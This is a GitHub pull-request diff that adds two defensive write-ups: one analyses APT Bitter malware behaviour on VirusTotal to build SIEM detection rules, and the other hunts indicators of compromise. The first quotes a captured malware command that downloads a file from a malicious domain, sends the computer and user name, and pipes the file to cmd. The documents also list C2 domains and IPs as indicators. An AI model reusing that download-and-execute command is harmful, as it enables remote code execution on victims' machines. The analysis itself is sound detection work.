Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

files #157

Merged
merged 1 commit into from
Sep 23, 2024
Merged

files #157

Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
# Efficient and Effective Way of Analyzing TTPs of Malware

## Introduction

In today's evolving cybersecurity landscape, analyzing malware and understanding its **Tactics, Techniques, and Procedures (TTPs)** is crucial to building effective defenses. This demonstration uses **Malware Bazaar** and **VirusTotal** to efficiently analyze malware samples, identify malicious behaviors, and extract key signatures.

**Malware Bazaar** is a vast repository of malware samples, contributed by the security community, researchers, and organizations. This analysis will use samples of **RAT** and **Stealer Malware** to uncover the methods and patterns they commonly employ, such as task scheduling, dropping executables in startup folders, and leveraging **PowerShell scripts** for executing commands or deploying shell scripts.

The analysis of these samples will take place on **VirusTotal**. On this well-established platform, files and URLs are scanned using various antivirus engines and behavioral analysis tools. VirusTotal will be useful in analyzing the malware samples obtained from Malware Bazaar, helping to highlight the techniques they employ and aiding in identifying key signatures that can be used to detect and mitigate threats by creating rules that will be integrated into **SIEM solutions**. By combining these tools, this demonstration aims to showcase a practical approach to efficiently recognizing critical malware behaviors for improved detection and response capabilities.

## Goals and Objectives

The main goal of this demonstration and documentation is to showcase an efficient method of analyzing **TTPs** of various malware samples attained from Malware Bazaar using VirusTotal. Additionally, this analysis aims to help my team improve the detection capabilities of the **SIEM solution** by identifying important signatures that can be used to create rules.

Initially, the **TTPs** of some malware samples used by **APT Bitter** (as shown in Figure 1) will be utilized to identify important patterns. I began with the analysis of **SHA256** `1cafe3979fbd529129440e058b8ed8e0d4e283325dee448816d3aa354f7c412a`, which is attributed as **Trojan-Downloader** because it downloads other stage malware such as **RAT** and **Info-Stealer Malware**.

Also, it can be seen in Figure 3 that the malware is using the following command “ ['--headless
cmd /c "curl -o C:\\users\\public\\Music\\cdr.tr
colorsofnether.com/bgte.php?hy=%computername%BBB%username% & more
C:\\users\\public\\Music\\cdr.tr|cmd"']” to connect and download another malwar.Such patterns are used by malicious actors to secretly download and execute **RAT** and **info-stealer** malware, as these malwares can be easily detected if used directly.

Hence, a rule can be created to generate an alert upon any process that involves:
Command Prompt && Curl Statement && .php? string
Similarly, `C:\\users\\public\\Music\\` is the directory where the malware is dropped. Therefore, a rule can be created to generate an alert if files with extensions `.exe`, `.zip`, `.py`, `.ps1`, `.psm1`, `.lnk`, and `.vbs` are dropped or used in the `C:\\users\\public\\Music\\` directory.

![](img\ef-1.jpg)
![](img\ef-2.jpg)

![](img\ef-3.jpg)

## Analysis of Next Malware

The next malware that was analyzed is a **RAT** malware with info-stealing capabilities having the **SHA256** hash:
dcdae583da8a1b01a8ad0caef6a7f6f3b6f1eb6dd3298ac7d904200f52712446
This malware was downloaded using the 1st stage malware as described previously. Some of the URLs that were used by the malware are shown in Figure 4, and the highlighted domain should be blocked in the **Firewall**.
![](img\ef-4.jpg)

![](img\ef-5.png)

## Important Signature Identification

One important signature identified in this analysis is the usage of the **Command Prompt** for the execution of the malware, as shown in Figure 6. Thus, a rule can be created that should alert if the command prompt executes any executable file.

While there may be some false alerts over time, the detection can be improved by optimizing the rules for better accuracy. This can include adding detections for any modifications in directories that malware typically alters to drop or delete files, along with changes in the **Registry**.

![](img\ef-6.jpg)

## Additional APT Bitter Malware Analysis

Some other **APT Bitter** malwares analyzed in this activity revealed more useful patterns, as shown in Figures 7 and 8. These patterns include:

- Scheduling tasks
- Using `hh.exe` to open `.chm` files
- Utilizing `msiexec` to execute `.msi` files

Therefore, similar rules can be created and integrated into the **SIEM** while testing them, to identify such malwares that are otherwise not easily detected by Anti-Malware Software.
![](img\ef-7.jpg)
![](img\ef-8.jpg)

## Conclusion

This demonstration provides a practical way of using **VirusTotal** and **Malware Bazaar** to efficiently analyze various malware samples to identify important signatures as outlined in this document. This method can be applied to more malware; however, we utilized only a few **APT Bitter** malware samples to showcase the method. The document clearly demonstrates the usability of VirusTotal in analyzing **TTPs** of different malware.

Overall, the blue team can use this method to analyze TTPs of many malwares in less time, allowing for the creation of various rules and optimizations for detection in **SIEM Solutions**.

## References

- [Malware Bazaar - APT Bitter Signatures](https://bazaar.abuse.ch/browse/signature/Bitter/)
- [VirusTotal](https://www.virustotal.com)
118 changes: 118 additions & 0 deletions docs/cybersecurity/research/Threat Intelligence.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,118 @@
# Threat Intelligence

## 1. Introduction

Threat intelligence, often referred to as cyber threat intelligence (CTI), is the process of collecting, analyzing, and utilizing information about potential or existing threats to an organization's digital infrastructure. It is an essential component of a proactive cybersecurity strategy, aimed at identifying and understanding the various risks posed by cyber threats.

Threat intelligence involves gathering data from a multitude of sources, including threat feeds, dark web monitoring, and open-source intelligence (OSINT), to anticipate and defend against cyberattacks.

One of the core activities in threat intelligence is hunting for **Indicators of Compromise (IOCs)**. IOCs are specific pieces of evidence that suggest a security breach or malicious activity within a network, such as unusual network traffic, malicious file signatures, or suspicious IP addresses. By actively searching for these indicators, cybersecurity professionals can detect and mitigate threats before they cause significant harm.

In addition to identifying IOCs, threat intelligence also involves the analysis of **Tactics, Techniques, and Procedures (TTPs)** used by cyber adversaries. TTPs are the methodologies and strategies employed by attackers to infiltrate, exploit, and maintain access to targeted systems. Understanding these patterns allows organizations to predict potential future attacks and develop more effective defensive measures.

The importance of threat intelligence cannot be overstated in today's increasingly digital world. As cyber threats become more sophisticated and persistent, organizations need to stay one step ahead of attackers. Effective threat intelligence not only helps in identifying and responding to current threats but also plays a crucial role in preventing future attacks by enhancing overall security posture and resilience.

Through the continuous monitoring and analysis of emerging threats, organizations can better protect their assets, reputation, and sensitive data from the ever-evolving cyber threat landscape.

## 2. Methodology

My main objective is to find and provide **IOCs** and create rules from **Tactics, Techniques, and Procedures (TTPs)** to be integrated into the SIEM solution so that the cyber-attacks associated with them can be proactively detected and responded to.

Following are the methodology steps that I intend to follow:

### 2.1. Threat Hunting

I will use Twitter feeds to search for the specific APT groups which are active in the region. Find their IOCs and then perform further threat hunting using **FOFA**, **Shodan**, **Verodin**, **VirusTotal**, and **Qinxin**.

### 2.2. Share IOCs

Then, I will share the TTPs and IOCs with the team to update their rules and IOCs management to defend the IT infrastructure proactively.

### 2.3. Create Rules

Afterward, I will create rules from the TTPs that will be integrated into the SIEM to detect and respond to such malicious activity.


![](img\ti-1.png)

## 3. Collecting IOCs from Twitter

Begin with the specific **Advanced Persistent Threats (APT)** group search feeds. **APT Lazarus** and **Bitter** are the North Korean and Indian groups, respectively, that are actively attacking IT infrastructure across the world.

Considering them to be the threats to **Redback Organization**, and being the threat intelligence person, I will begin with their search tags as shown in Figures 2 and 3. Their results are shown in Figures 4 and 5.


![](img\ti-2.png)

![](img\ti-3.png.jpg)

![](img\ti-4.png.jpg)

![](img\ti-5.png.jpg)

After getting some latest search results, I will begin with collecting **IOCs** and share them afterward with the team to block them.

Here are some of the latest IOCs that I have collected that I will share with the team to block:

| **APT Bitter IOCs** | **APT Lazarus IOCs** |
|----------------------------|------------------------|
| Kimfilippovision[.]com | bitbucket[.]org |
| devflowservice[.]com | tpddata.com |
| mcdavezonepanel[.]com | itaddnet.com |
| mxuconlinegame[.]com | wifispeedcheck.net |
| 194.36.191.199 | coinoen.org |

**Table 1: Some of the Collected IOCs**

## 4. Threat Hunting

Collecting **IOCs** from the Internet has indeed some advantages; however, it is not sufficient to rely only on open-source intelligence. Hence, threat hunting becomes the optimal solution under these circumstances, helping in hunting and gathering more IOCs relevant to the reported IOCs.

Let's begin hunting some IOCs using **FOFA**, **Validin**, and **VirusTotal**:

The IOC `mxuconlinegame[.]com` is used to collect more IOCs relevant to it.

1. Search IOC on **FOFA**.
![](img\ti-6.png.jpg)

2. Analyze the information that can be used to hunt more IOCs as shown in Figure 7.
![](img\ti-7.png.jpg)

3. Create a query of the common patterns to search for more relevant IOCs. The goal is to filter out until the most prominent results are acquired.
![](img\ti-8.png.jpg)

4. Collect the results and analyze them further on **VirusTotal** and **Qianxin**. The following are the newly hunted IOCs:
- `patch-manger[.]com`
- `ferrinonlinemuseum[.]com`
- `82.221.136.1`
- `82.221.136.47`
![](img\ti-9.png.jpg)

5. Search further about the identified IOCs.
![](img\ti-10.png.jpg)
![](img\ti-11.png.jpg)

After analyzing further, it was concluded that these IPs and domains belong to **APT Bitter**, and they are acting as **C2 Servers**.

Hence, the IOCs that can be shared with the team are:

- `patch-manger[.]com`
- `ferrinonlinemuseum[.]com`
- `82.221.136.1`
- `82.221.136.47`

## 5. Conclusion

**Threat Intelligence** is an important part of cybersecurity operations. This document thoroughly explained how threat intelligence can be useful in proactively defending against **APTs**. However, the document only focused on explaining a single unique and efficient method of hunting IOCs.

There are further tools and platforms that are collectively used for threat intelligence, such as **MailTrail**, **SOC Radar**, **Group IB**, and **Zeek**. But the method demonstrated in this document is found to be the most effective and efficient in identifying and hunting more IOCs. The document is limited specifically to showcase a single case. If required, it can be expanded further to **malware** and **tactics, techniques, and procedures (TTPs)** analysis.

## 6. References

- EC-Council. (2024, March 7). *What is Cyber Threat Intelligence | Cyber Threat Intelligence Analyst | Types of Threat Intelligence | EC-Council*. Cybersecurity Exchange. [Link to article](https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/what-is-cyber-threat-intelligence/#:~:text=Cyber%20threat%20intelligence%20is%20information)

- Shen, G. (2023, March 20). *Use Searching Engines to Hunt For Threat Actors*. Medium. [Link to article](https://gustavshen.medium.com/use-searching-engines-to-hunt-for-threat-actors-74be52976e9f)

- [FOFA](https://en.fofa.info)

- [VirusTotal](https://www.virustotal.com)
Binary file added docs/cybersecurity/research/img/ef-1.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-2.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-3.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-4.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-5.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-6.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-7.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ef-8.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-10.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-11.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-3.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-4.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-5.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-6.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-7.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-8.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/cybersecurity/research/img/ti-9.png.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.